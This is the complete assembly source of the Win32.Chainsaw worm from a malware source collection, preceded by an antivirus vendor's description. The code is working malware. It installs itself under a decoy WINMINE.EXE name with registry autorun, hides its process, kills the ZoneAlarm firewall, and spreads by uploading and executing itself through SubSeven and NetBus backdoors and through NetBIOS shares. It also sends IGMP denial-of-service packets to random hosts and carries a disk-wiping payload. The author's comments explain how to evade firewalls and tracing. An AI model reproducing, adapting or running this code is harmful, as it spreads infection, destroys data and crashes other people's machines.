MalwareSourceCode/Win32/I-Worm.Chainsaw.asm
2020-10-09 22:25:52 -05:00

1599 lines
61 KiB
NASM

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.ASM]ÄÄÄ
; AVP description.
; ---------------------------------------------------------------------------
; Worm.Chainsaw
;
; This is a network worm with Internet spreading ability. When the worm
; is run on a system for the first time, it installs itself. To do that it
; copies itself to the Windows system directory using the filename
; WINMINE.EXE and also to the root directory of the current drive using the
; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set.
; The worm then registers itself in the system registry, auto-run key:
;
; HKCU\Software\Microsoft\Windows\CurrentVersion\Run
; Mines = path\WINMINE.EXE
;
; where "path" is the Windows system directory name. The worm then exits and
; triggers its infection routines when run during the next Windows startup.
;
; During the next Windows startup the worm is automatically executed by
; Windows by an auto-run key in the system registry. The worm then registers
; itself as hidden application and runs its spreading routine. That routine
; enumerates shared drives on the local networks [* It doesn't even get near
; local shares. *], gets the Windows directory on a drive (if there is one),
; copies itself to there using the filename CHAINSAW.EXE (if the drive is
; mapped for full access) and registers itself in there by writing the "Run="
; instruction to the [windows] section of the WIN.INI file on the remote
; drive. During the next Windows restart the worm copy will be activated and
; will complete the infection.
;
; When the worm is started it sends a notifying message to the
; "alt.horror" conference. The message has the fields:
;
; From: "Leatherface" <hacked.up.for@bbq.net>
; Subject: CHAINSAWED
; Newsgroups: alt.horror
; Message body:
;
; WHO WILL SURVIVE
; AND WHAT WILL BE LEFT OF THEM?
;
; The worm also tries to send its copies to remote machines. To do that it
; gets randomly selected IP addresses in an endless loop and tries to connect
; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan
; program on the remote machine (if the machine is infected by a backdoor
; program). After successfully connecting, the worm sends its copy to the
; remote machine and forces the Backdoor to execute it there. The list of
; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious
; that the worm has a very low chance to spread itself in such a way [*
; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread,
; and are currently in the wild in large numbers, try to explain me this
; then. *]
;
; Depending on the system date the worm also sends a "Deny-of-service"
; packet to a randomly selected IP address. That packet is prepared so that
; it may cause a remote Win9x machine to crash (because of a bug in Win9x
; libraries). The worm intends to do that on the 31th of the month, but
; because of a bug compares that value with "year" field, and as a result
; will bomb random selected machines only if tje system date is set to the
; year 0031 [* Oops! Well atleast this version has it fixed :*]
;
; The worm also disables the "ZoneAlarm" Internet protection utility.
;
; Depending on its random counter the worm spawns a trojan program that
; erases data on the hard drive by writing the text to there:
;
; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
; THE TEXAS CHAIN SAW MASSACRE..."
; ---------------------------------------------------------------------------
;============================================================================
;
;
; NAME: Win32.Chainsaw v1.01
; TYPE: NetBios/SubSeven/NetBus worm.
; DATE: July - September 2000.
; AUTHOR: T-2000 / Immortal Riot.
; E-MAIL: T2000_@hotmail.com
; PAYLOAD: Sector trashing.
;
; FEATURES:
;
; - Disables ZoneAlarm firewall.
; - Not visible in 9x tasklist.
; - Sends usenet message on installation.
; - DoS'es random hosts on 31st of any month.
; - Anti-debugging code.
;
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
; or NetBios, and then installs itself in the systems it can get access
; to. It's main payload is to IGMP DoS random Internet hosts on every 31st
; of the month, which will BSOD every released version of Windoze 95/98
; that isn't patched or firewalled.
;
;============================================================================
; I've kept the code clear and understandable for everyone, no optimizations
; of any kind, mainly due the file alignment, the filesize will usually just
; stay the same wether your code is optimized or not.
.386
.MODEL FLAT
.DATA
JUMPS
; Converts a little indian word to a big indian word.
DWBI MACRO Lil_Indian
DW (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8)
ENDM
EXTRN WSAGetLastError:PROC
EXTRN ioctlsocket:PROC
EXTRN ExitProcess:PROC
EXTRN WSAStartup:PROC
EXTRN WritePrivateProfileStringA:PROC
EXTRN WSACleanup:PROC
EXTRN socket:PROC
EXTRN closesocket:PROC
EXTRN setsockopt:PROC
EXTRN InternetGetConnectedState:PROC
EXTRN DeleteFileA:PROC
EXTRN connect:PROC
EXTRN setsockopt:PROC
EXTRN PeekMessageA:PROC
EXTRN SetFileAttributesA:PROC
EXTRN GetSystemDirectoryA:PROC
EXTRN CreateFileA:PROC
EXTRN recv:PROC
EXTRN send:PROC
EXTRN sendto:PROC
EXTRN CloseHandle:PROC
EXTRN GetSystemTime:PROC
EXTRN GetModuleHandle
EXTRN RegOpenKeyExA:PROC
EXTRN RegSetValueExA:PROC
EXTRN RegCloseKey:PROC
EXTRN ReadFile:PROC
EXTRN CopyFileA:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetCancelConnection2A:PROC
EXTRN SetErrorMode:PROC
EXTRN GetModuleFileNameA:PROC
EXTRN FindWindowA:PROC
EXTRN PostMessageA:PROC
EXTRN GetTickCount:PROC
EXTRN WriteFile:PROC
EXTRN GetLocalTime:PROC
EXTRN WinExec:PROC
EXTRN select:PROC
EXTRN GetPrivateProfileStringA:PROC
EXTRN GetModuleHandleA:PROC
EXTRN GetProcAddress:PROC
EXTRN WNetAddConnection2A:PROC
EXTRN WNetEnumResourceA:PROC
EXTRN WNetOpenEnumA:PROC
EXTRN WNetCloseEnum:PROC
EXTRN RegQueryValueExA:PROC
EXTRN gethostbyname:PROC
EXTRN inet_ntoa:PROC
Worm_Size EQU 6144
SEM_NOGPFAULTERRORBOX EQU 00000002h
OPEN_EXISTING EQU 00000003h
CREATE_ALWAYS EQU 00000002h
SO_SNDTIMEO EQU 1005h
SO_RCVTIMEO EQU 1006h
RESOURCE_GLOBALNET EQU 00000002h
RESOURCEUSAGE_CONNECTABLE EQU 00000001h
RESOURCEUSAGE_CONTAINER EQU 00000002h
RESOURCEUSAGE_CONNECTABLE EQU 00000001h
RESOURCETYPE_DISK EQU 00000001h
SOL_SOCKET EQU 0FFFFh
HKEY_CURRENT_USER EQU 80000001h
KEY_QUERY_VALUE EQU 1
KEY_WRITE EQU 00020006h
REG_SZ EQU 00000001h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
FILE_SHARE_READ EQU 00000001h
FILE_ATTRIBUTE_HIDDEN EQU 2
AF_INET EQU 2
IPPROTO_IGMP EQU 2
SOCK_STREAM EQU 1
SOCK_RAW EQU 3
FIONBIO EQU 8004667Eh
WM_QUIT EQU 0012h
S7_Upload_Req DB 'RTFChainsaw.exe'
End_S7_Upload_Req:
S7_Upload_Size DB 'SFT046144'
End_S7_Upload_Size:
S7_Exec_Req DB 'FMXChainsaw.exe'
End_S7_Exec_Req:
NB_Password DB 'Password;1;netbus', 0Dh
End_NB_Password:
NB_Upload_Req DB 'UploadFile;Chainsaw.exe;6144;\', 0Dh
End_NB_Upload_Req:
NB_Exec_File DB 'StartApp;\Chainsaw.exe', 0Dh
End_NB_Exec_File:
Nuke_File DB 'BBQ666.COM', 0
sz_Kernel32 DB 'KERNEL32', 0
sz_RegServProc DB 'RegisterServiceProcess', 0
Win_Ini_Run_Key DB 'run', 0
Windows_Section DB 'windows', 0
Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0
ZoneAlarm_Window DB 'ZoneAlarm', 0
Reg_Handle_1 DD 0
Reg_Handle_2 DD 0
sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0
Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\'
Account_Index DB '00000000', 0
sz_Def_News_Acc DB 'Default News Account', 0
sz_NNTP_Server DB 'NNTP Server', 0
Size_Acc_Buffer DD 9
Size_NNTP_Buf DD 128
s_POST DB 'POST', 0Dh, 0Ah
s_QUIT DB 'QUIT', 0Dh, 0Ah
; Header.
News_Message: DB 'From: "Leatherface" <hacked.up.for@bbq.net>', 0Dh, 0Ah
DB 'Subject: CHAINSAWED', 0Dh, 0Ah
DB 'Newsgroups: alt.horror', 0Dh, 0Ah
DB 0Dh, 0Ah
; Body.
DB 'WHO WILL SURVIVE', 0Dh, 0Ah
DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah
; End-of-data command.
DB '.', 0Dh, 0Ah
End_News_Message:
MsDos_Sys DB 'T:\MSDOS.SYS', 0
Win_Dir_Key DB 'WinDir', 0
Paths_Section DB 'Paths', 0
Slash_Win_Ini DB '\'
Win_Ini DB 'WIN.INI', 0
Remote_Drive DB 'T:', 0
Cover_Name DB '\WINMINE.EXE', 0
Remote_Trojan DB 'T:'
Root_Dropper DB '\Chainsaw.exe', 0
Run_Key_Name DB 'Mines', 0
Boole_False DD 0
Boole_True DD 1
NetBios_Remote DB '\\666.666.666.666', 0
Time_Out: DD 1 ; - Seconds.
DD 500 ; - Milliseconds.
IO_Time_Out DD 5000
Usenet_Conn: DW AF_INET ; connect() structures.
DWBI 119
Usenet_IP DD 0
DB 8 DUP(0)
Nuke_Conn: DW AF_INET
DW 0
Nuke_IP DD 0
DB 8 DUP(0)
Sub7_Conn: DW AF_INET
DWBI 27374
Sub7_IP DD 0
DB 8 DUP(0)
NetBus_Conn: DW AF_INET
DWBI 12345
NetBus_IP DD 0
DB 8 DUP(0)
NetBus_Conn_2: DW AF_INET
DWBI (12345+1)
NetBus_IP_2 DD 0
DB 8 DUP(0)
NetBios_Conn: DW AF_INET
DWBI 139
NetBios_IP DD 0
DB 8 DUP(0)
Win_Dir DB 260 DUP(0)
Default_String DB 0
Own_Path DB 260 DUP(0)
Net_Struc_Count DD 1
Enum_Buf_Size DD 666
Enum_Buffer DB 666 DUP(0)
Net_Resource_Struc:
DD 0
DD 0
DD 0
DD 0
DD 0
DD OFFSET NetBios_Remote
DD 0
DD 0
Net_Resource: DD 0
DD 0
DD 0
Net_Usage DD 0
Net_Local_Name DD 0
Net_Remote_Name DD 0
DD 0
DD 0
Select_Struc:
Sock_Count DD 3
Sub7_Socket DD 0
NetBus_Socket DD 0
NetBios_Socket DD 0
IGMP_Socket DD 0
News_Socket DD 0
NetBus_Socket_2 DD 0
Connect_Select: DD 4 DUP(0)
IGMP_Nuke DB 15000 DUP(0)
Temp DD 0
Random_Init DD 0
Enum_Handle DD 0
Size_Cover_Path DD 0
System_Time DW 8 DUP(0)
Worm_Code DB Worm_Size DUP(0)
WSA_Data DB 400 DUP(0)
System_Dir DB 260 DUP(0)
NNTP_Server DB 128 DUP(0)
Buffer DB 512 DUP(0)
.CODE
DB '[-T2IR-]', 0
START:
PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out
CALL SetErrorMode ; without displaying shit.
PUSH 0 ; Fake a dispatch to get the
PUSH 0 ; hourglass cursor to
PUSH 0 ; disappear.
PUSH 0
PUSH 0
CALL PeekMessageA
; Get offset of CreateFileA in the jump table.
MOV ESI, DWORD PTR CreateFileA+2
LODSD
; Soft-Ice's BPX command works with 0CCh breakpoints
; to hook API's, so here we simply check if a common
; API has been hooked and kill the system if true.
; For a virus it's better to check every fetched API
; for a debugger hook.
CMP BYTE PTR [ESI], 0CCh ; Debugger has a hook on it?
JE Payload
CALL GetTickCount
MOV Random_Init, EAX
PUSH 260 ; Get the path to ourself.
PUSH OFFSET Own_Path
PUSH 0
CALL GetModuleFileNameA
MOV EDI, OFFSET System_Dir
PUSH 260 ; Get the System directory.
PUSH EDI
CALL GetSystemDirectoryA
MOV ESI, OFFSET Cover_Name
ADD EDI, EAX
MOVSD ; Append our cover name
MOVSD ; \WINMINE.EXE to it.
MOVSD
MOVSB
SUB EDI, OFFSET System_Dir ; Save size of path.
MOV Size_Cover_Path, EDI
PUSH 1 ; Copy us to the system
PUSH OFFSET System_Dir ; directory under the cover
PUSH OFFSET Own_Path ; name.
CALL CopyFileA
XCHG ECX, EAX ; Virus is already installed?
JECXZ Check_Trigger
PUSH 1 ; Copy root dropper to root
PUSH OFFSET Root_Dropper ; to indicate this is the 1st
PUSH OFFSET Own_Path ; run of the worm.
CALL CopyFileA
PUSH FILE_ATTRIBUTE_HIDDEN ; Hide it.
PUSH OFFSET Root_Dropper
CALL SetFileAttributesA
PUSH OFFSET Reg_Handle_1 ; Open up a handle to the
PUSH KEY_WRITE ; registry Run key.
PUSH 0
PUSH OFFSET Run_Key
PUSH HKEY_CURRENT_USER
CALL RegOpenKeyExA
PUSH Size_Cover_Path ; Make the cover file run
PUSH OFFSET System_Dir ; every bootup.
PUSH REG_SZ
PUSH 0
PUSH OFFSET Run_Key_Name
PUSH Reg_Handle_1
CALL RegSetValueExA
PUSH Reg_Handle_1 ; Close registry key.
CALL RegCloseKey
PUSH OFFSET Win_Ini ; Remove temporary reference
PUSH 0 ; to virus dropper in
PUSH OFFSET Win_Ini_Run_Key ; WIN.INI.
PUSH OFFSET Windows_Section
CALL WritePrivateProfileStringA
Exit: PUSH 0
CALL ExitProcess
Check_Trigger: MOV EAX, 666 ; 1/666 chance of activating.
CALL Random_EAX
DEC EAX ; Today is trashday?
JZ Payload
PUSH 0 ; Open ourselves.
PUSH 0
PUSH OPEN_EXISTING
PUSH 0
PUSH FILE_SHARE_READ
PUSH GENERIC_READ
PUSH OFFSET Own_Path
CALL CreateFileA
MOV EBX, EAX
INC EAX
JZ Exit
PUSH 0 ; Read in ourselves.
PUSH OFFSET Temp
PUSH Worm_Size+1
PUSH OFFSET Worm_Code
PUSH EBX
CALL ReadFile
CMP Temp, Worm_Size ; Wormsize has changed?
JNE Payload ; Then we're likely
; incomplete or infected
; with a virus.
PUSH EBX ; Close ourselves again.
CALL CloseHandle
PUSH OFFSET sz_Kernel32 ; Get base of KERNEL32.DLL.
CALL GetModuleHandleA
PUSH OFFSET sz_RegServProc ; Get RegisterServiceProcess.
PUSH EAX
CALL GetProcAddress
XCHG ECX, EAX
JECXZ Init_Winsock
PUSH 1 ; Register our process as a
PUSH 0 ; hidden service.
CALL ECX
Init_Winsock: PUSH OFFSET WSA_Data ; Initialize winsock.
PUSH 0202h
CALL WSAStartup
OR EAX, EAX ; Error?
JNZ Exit
Chk_Inet_State: PUSH 0 ; We're connected to the
PUSH OFFSET Temp ; Internet?
CALL InternetGetConnectedState
DEC EAX ; Else just loop and check
JNZ Chk_Inet_State ; again until we are.
; Here we close the ZoneAlarm firewall if it is
; found active, reason being that A) it will pop-up
; a warning box whenever a program (ie. our worm)
; is attempting to access the Internet, (this is how
; many RAT trojans get caught these days) and B) it
; is likely to block our ports.
PUSH OFFSET ZoneAlarm_Window ; Attempt to locate the
PUSH 0 ; ZoneAlarm window.
CALL FindWindowA
XCHG ECX, EAX
JECXZ Check_1st_Run
PUSH 0 ; Tell ZoneAlarm to quit.
PUSH 0
PUSH WM_QUIT
PUSH ECX
CALL PostMessageA
Check_1st_Run: PUSH OFFSET Root_Dropper ; Can we delete the root
CALL DeleteFileA ; dropper?
XCHG ECX, EAX
JECXZ Do_Random_IP
; This is the first Internet run of the worm, so
; send a usenet message to alt.horror to note
; our presence. Better to just use a public
; dump place instead of e-mail for example, this
; way they can't track you or kill the account.
PUSH OFFSET Reg_Handle_1 ; Open a handle to Internet
PUSH KEY_QUERY_VALUE ; Account Manager.
PUSH 0
PUSH OFFSET sz_Account_Mgr
PUSH HKEY_CURRENT_USER
CALL RegOpenKeyExA
OR EAX, EAX
JNZ Do_Random_IP
PUSH OFFSET Size_Acc_Buffer ; Get default news account.
PUSH OFFSET Account_Index
PUSH 0
PUSH 0
PUSH OFFSET sz_Def_News_Acc
PUSH Reg_Handle_1
CALL RegQueryValueExA
OR EAX, EAX
JNZ Close_Reg_1
PUSH OFFSET Reg_Handle_2 ; Open the default news
PUSH KEY_QUERY_VALUE ; account.
PUSH 0
PUSH OFFSET Account_Key
PUSH HKEY_CURRENT_USER
CALL RegOpenKeyExA
OR EAX, EAX
JNZ Close_Reg_1
PUSH OFFSET Size_NNTP_Buf ; Get it's NNTP server.
PUSH OFFSET NNTP_Server
PUSH 0
PUSH 0
PUSH OFFSET sz_NNTP_Server
PUSH Reg_Handle_2
CALL RegQueryValueExA
OR EAX, EAX
JNZ Close_Reg_2
PUSH OFFSET NNTP_Server ; Convert the DNS-name to
CALL gethostbyname ; an IP-address.
XCHG ECX, EAX
JECXZ Close_Reg_2
MOV ESI, [ECX+12] ; Fetch IP-address.
LODSD
PUSH DWORD PTR [EAX]
POP Usenet_IP
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
MOV News_Socket, EAX
INC EAX ; Error?
JZ Close_Reg_2
MOV EBX, News_Socket
CALL Set_Time_Outs
PUSH 16
PUSH OFFSET Usenet_Conn
PUSH News_Socket
CALL connect
INC EAX
JZ Close_Reg_2
MOV EDI, OFFSET Buffer
PUSH 0 ; Receive data from the
PUSH 512 ; socket.
PUSH EDI
PUSH News_Socket
CALL recv
INC EAX
JZ Close_News
CMP BYTE PTR [EDI], '2'
JNE Send_QUIT
PUSH 0
PUSH 6
PUSH OFFSET s_POST
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
PUSH 0 ; Receive data from the
PUSH 512 ; socket.
PUSH EDI
PUSH News_Socket
CALL recv
INC EAX
JZ Close_News
CMP BYTE PTR [EDI], '3'
JNE Send_QUIT
PUSH 0
PUSH (End_News_Message-News_Message)
PUSH OFFSET News_Message
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
PUSH 0 ; Receive data from the
PUSH 512 ; socket.
PUSH EDI
PUSH News_Socket
CALL recv
INC EAX
JZ Close_News
Send_QUIT: PUSH 0
PUSH 6
PUSH OFFSET s_QUIT
PUSH News_Socket
CALL send
INC EAX
JZ Close_News
PUSH 0 ; Receive data from the
PUSH 512 ; socket.
PUSH EDI
PUSH News_Socket
CALL recv
Close_News: PUSH News_Socket
CALL closesocket
Close_Reg_2: PUSH Reg_Handle_2
CALL RegCloseKey
Close_Reg_1: PUSH Reg_Handle_1
CALL RegCloseKey
Do_Random_IP: CALL Random_AL_254 ; Get random octet (1-254).
XCHG EBX, EAX
CALL Random_AL_254 ; Another one.
SHL EBX, 8
MOV BL, AL
CALL Random_AL_254 ; And another one.
SHL EBX, 8
MOV BL, AL
Rand_A_Class: MOV AL, 223 ; Random A/B/C class IP.
CALL Random_AL
CMP AL, 10 ; Private network segment.
JE Rand_A_Class
CMP AL, 127 ; Localhost network.
JE Rand_A_Class
SHL EBX, 8
MOV BL, AL
MOV Nuke_IP, EBX
MOV Sub7_IP, EBX ; Store the random IP in our
MOV NetBus_IP, EBX ; structures.
MOV NetBus_IP_2, EBX
MOV NetBios_IP, EBX
PUSH OFFSET System_Time ; Get system date.
CALL GetSystemTime
CMP System_Time+(3*2), 31 ; Is today nuke day?
JNE IP_To_ASCIIZ
PUSH IPPROTO_IGMP ; Create a raw IGMP socket.
PUSH SOCK_RAW
PUSH AF_INET
CALL socket
MOV IGMP_Socket, EAX
INC EAX
JZ Do_Random_IP
MOV EDI, 10 ; Send 10 nuke packets.
; Windows 95/98 has problems with handling fragmented IGMP
; packets, when processing a whole bunch of these the system
; will usually BSOD. Here we simply send a large packet (the
; packet will arrive regardless of content it seems), which
; will automatically be fragmented by the underlying TCP/IP
; layers. Officially IGMP packets aren't supposed to leave
; the current subnet, so if your ISP uses filtering (mainly
; cable/ADSL connections), this nuke won't get through,
; however SLIP/PPP connections (mainly dialups), seem to have
; no problems delivering it.
Send_Nuke: PUSH 16 ; Send the nuke.
PUSH OFFSET Nuke_Conn
PUSH 0
PUSH 15000
PUSH OFFSET IGMP_Nuke
PUSH IGMP_Socket
CALL sendto
DEC EDI ; Send all 10 packets.
JNZ Send_Nuke
Exit_Nuke: PUSH IGMP_Socket
CALL closesocket
JMP Do_Random_IP
IP_To_ASCIIZ: PUSH EBX ; Convert DWORD to ASCIIZ
CALL inet_ntoa ; for the NetBios API's.
XCHG ESI, EAX
MOV EDI, OFFSET NetBios_Remote+2
; Copy the ASCIIZ IP to our own buffer.
Copy_ASCIIZ_IP: LODSB
STOSB
OR AL, AL ; Did entire ASCIIZ string?
JNZ Copy_ASCIIZ_IP
PUSH 0 ; Create sockets.
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
MOV Sub7_Socket, EAX
INC EAX
JZ Chk_Inet_State
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
MOV NetBus_Socket, EAX
INC EAX
JZ Close_Sub7
PUSH 0
PUSH SOCK_STREAM
PUSH AF_INET
CALL socket
MOV NetBios_Socket, EAX
INC EAX
JZ Close_NetBus
; The standard connect() timeout interval is like 100 seconds
; or so, obviously this is way to long for portscanning, so we
; need to set our own timeout interval. Unfortunately Winsock
; does not have any API that can set a connect() timeout interval
; (neither does BSD Sockets btw). Kind of stupid, but anyways,
; here we realize our own timeout function by first switching
; the connect() sockets to non-blocking mode, and then running
; select() on em with a 1500ms timeout to see if they are connected.
PUSH OFFSET Boole_True ; Set socket to non-blocking
PUSH FIONBIO ; mode.
PUSH Sub7_Socket
CALL ioctlsocket
PUSH OFFSET Boole_True
PUSH FIONBIO
PUSH NetBus_Socket
CALL ioctlsocket
PUSH OFFSET Boole_True
PUSH FIONBIO
PUSH NetBios_Socket
CALL ioctlsocket
PUSH 16 ; Connect SubSeven port.
PUSH OFFSET Sub7_Conn
PUSH Sub7_Socket
CALL connect
PUSH 16 ; Connect NetBus port.
PUSH OFFSET NetBus_Conn
PUSH NetBus_Socket
CALL connect
PUSH 16 ; Connect NetBios port.
PUSH OFFSET NetBios_Conn ; (only to quickly probe the
PUSH NetBios_Socket ; host for NetBios).
CALL connect
MOV ESI, OFFSET Select_Struc
MOV EDI, OFFSET Connect_Select
MOVSD
MOVSD
MOVSD
MOVSD
PUSH OFFSET Time_Out ; Check if any sockets are
PUSH 0 ; writeable (connected)
PUSH OFFSET Connect_Select ; within 1500ms.
PUSH 0
PUSH 0
CALL select
INC EAX ; Error?
JZ Close_NetBios
DEC EAX ; Zero sockets connected?
JZ Close_NetBios
PUSH OFFSET Boole_False ; Switch sockets back to
PUSH FIONBIO ; blocking mode.
PUSH Sub7_Socket
CALL ioctlsocket
PUSH OFFSET Boole_False
PUSH FIONBIO
PUSH NetBus_Socket
CALL ioctlsocket
MOV EBX, Sub7_Socket ; Set send/recv timeout on
CALL Set_Time_Outs ; sockets to prevent endless
; blocking.
MOV EBX, NetBus_Socket
CALL Set_Time_Outs
MOV EDI, OFFSET Buffer ; recv-buffer.
Try_Sub7: PUSH 0 ; Attempt to get SubSeven
PUSH 512 ; connection reply.
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX ; Not connected?
JZ Try_NetBus
; If it's a SubSeven server, and not password
; protected, it should reply with 'connected',
; and the time/date and version.
CMP [EDI], 'nnoc' ; If we can't access the Sub7
JNE Try_NetBus ; server, move on to NetBus.
; First request a file upload by sending
; 'RTF' with the upload path connected to
; it: 'RTFChainsaw.exe'.
PUSH 0
PUSH (End_S7_Upload_Req-S7_Upload_Req)
PUSH OFFSET S7_Upload_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
PUSH 0 ; Fetch the reply, it should
PUSH 512 ; be 'TID' if all is OK.
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
CMP [EDI], 'nDIT' ; Check for 'TID' (plus last
JNE Try_NetBus ; byte of previous recv).
; First let the server know the filesize of the
; upload, this is done by sending a 'SFT' + the
; length of the filesize (represented by two
; numbers) + the actual filesize: 'SFT046144'.
PUSH 0
PUSH (End_S7_Upload_Size-S7_Upload_Size)
PUSH OFFSET S7_Upload_Size
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
PUSH 0 ; Then send the actual file
PUSH Worm_Size ; contents.
PUSH OFFSET Worm_Code
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
; SubSeven works with a 1041-byte receive buffer, every
; 1041 or less bytes received will be acknowledged with
; a 'p:' + the total amount of bytes received + '.'.
Retrieve_Ack: PUSH 0 ; Receive a 7-byte 'p:xxxx.'
PUSH 7 ; (don't read more than 7
PUSH EDI ; bytes as often the data is
PUSH Sub7_Socket ; overlapping).
CALL recv
INC EAX
JZ Try_NetBus
CMP [EDI+2], '4416' ; Last acknowledgement?
JNE Retrieve_Ack ; Otherwise just go on.
; Check upload reply, which should be 'file successfully uploaded.'
; if all went fine, (however it seems to return this regardless of
; success or failure..).
Check_UL_Reply: PUSH 0
PUSH 512
PUSH EDI
PUSH Sub7_Socket
CALL recv
INC EAX
JZ Try_NetBus
CMP [EDI+5], 'ccus' ; Check for 'success'.
JNE Try_NetBus ; Bail on error.
; Now remotely execute the uploaded worm copy by sending a
; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'.
; SubSeven uses ShellExecuteA to run files, so it is capable
; of opening any registered file extension such as .VBS etc.
PUSH 0
PUSH (End_S7_Exec_Req-S7_Exec_Req)
PUSH OFFSET S7_Exec_Req
PUSH Sub7_Socket
CALL send
INC EAX
JZ Try_NetBus
PUSH 0 ; Fetch the command reply,
PUSH 512 ; which should be
PUSH EDI ; 'file has been executed.'.
PUSH Sub7_Socket
CALL recv
Try_NetBus: PUSH 0 ; Fetch connection reply.
PUSH 512
PUSH EDI
PUSH NetBus_Socket
CALL recv
INC EAX
JZ Try_NetBios
; NetBus servers respond with 'NetBus', and
; the version, and if the server is password
; protected also with an 'x'.
CMP [EDI], 'BteN' ; Is it an actual NetBus
JNE Try_NetBios ; server?
; Server is password protected?
CMP BYTE PTR [EDI+EAX-3], 'x'
JNE Upload_Worm
; Now try one password, 'netbus' (should be commonly used
; I guess), together with a NetBus 1.60- backdoor function
; that accepts any password.
PUSH 0
PUSH (End_NB_Password-NB_Password)
PUSH OFFSET NB_Password
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
PUSH 0 ; Get password reply.
PUSH 512
PUSH EDI
PUSH NetBus_Socket
CALL recv
INC EAX
JZ Try_NetBios
; If the password got accepted then it
; should return 'Access;1'.
CMP [EDI+4], '1;ss' ; 'Access;1' ?
JNE Try_NetBios
; Request a file upload by sending 'UploadFile;'
; + filename + ';' + filesize + ';' + upload path:
; 'UploadFile;Chainsaw.exe;6144;\'.
Upload_Worm: PUSH 0
PUSH (End_NB_Upload_Req-NB_Upload_Req)
PUSH OFFSET NB_Upload_Req
PUSH NetBus_Socket
CALL send
INC EAX
JZ Try_NetBios
PUSH 0 ; Fetch upload reply which
PUSH 512 ; should be 'UploadReady'.
PUSH EDI
PUSH NetBus_Socket
CALL recv
INC EAX
JZ Try_NetBios
CMP [EDI+4], 'eRda' ; 'UploadReady' ?
JNE Try_NetBios
; Now connect to port number <NetBus_Port+1>,
; which will handle the upload file content.
PUSH 0 ; Create a socket for the
PUSH SOCK_STREAM ; upload connection.
PUSH AF_INET
CALL socket
MOV NetBus_Socket_2, EAX
INC EAX
JZ Try_NetBios
MOV EBX, NetBus_Socket_2
CALL Set_Time_Outs
PUSH 16 ; Connect the upload socket.
PUSH OFFSET NetBus_Conn_2
PUSH NetBus_Socket_2
CALL connect
XCHG EBX, EAX
OR EBX, EBX
JNZ Close_NetBus_2
PUSH 0 ; Send through the upload
PUSH Worm_Size ; file contents.
PUSH OFFSET Worm_Code
PUSH NetBus_Socket_2
CALL send
XCHG EBX, EAX
Close_NetBus_2: PUSH NetBus_Socket_2
CALL closesocket
INC EBX
JZ Close_NetBios
; Now remotely execute the worm on the target's
; system by sending 'StartApp;' + path to program:
; 'StartApp;\Chainsaw.exe'.
PUSH 0
PUSH (End_NB_Exec_File-NB_Exec_File)
PUSH OFFSET NB_Exec_File
PUSH NetBus_Socket
CALL send
Try_NetBios: MOV ESI, OFFSET Net_Resource_Struc
MOV EDI, OFFSET Net_Resource
MOV ECX, 8
REP MOVSD
CALL Locate_Shares ; Infect all shared drives.
Close_NetBios: PUSH NetBios_Socket
CALL closesocket
Close_NetBus: PUSH NetBus_Socket
CALL closesocket
Close_Sub7: PUSH Sub7_Socket
CALL closesocket
JMP Chk_Inet_State
; Set the recv/send timeout to 5 seconds to prevent endless blocking.
Set_Time_Outs:
PUSH 4
PUSH OFFSET IO_Time_Out
PUSH SO_RCVTIMEO
PUSH SOL_SOCKET
PUSH EBX
CALL setsockopt
PUSH 4
PUSH OFFSET IO_Time_Out
PUSH SO_SNDTIMEO
PUSH SOL_SOCKET
PUSH EBX
CALL setsockopt
RETN
Random_AL_254:
MOV AL, 254
Random_AL: MOVZX EAX, AL
Random_EAX: PUSH EAX
CALL GetTickCount
ADD EAX, Random_Init
JNP Xor_In_Init
RCL EAX, 2
XCHG AL, AH
ADD AL, 66h
Xor_In_Init: NOT EAX
PUSH 32
POP ECX
CRC_Bit: SHR EAX, 1
JNC Loop_CRC_Bit
XOR EAX, 0EDB88320h
Loop_CRC_Bit: LOOP CRC_Bit
POP ECX
XOR EDX, EDX
DIV ECX
XCHG EDX, EAX
INC EAX ; Can't be zero.
ROL Random_Init, 1 ; Adjust random seed.
RETN
; And I thought NetBus was a lame buggy piece of shit, nothing beats
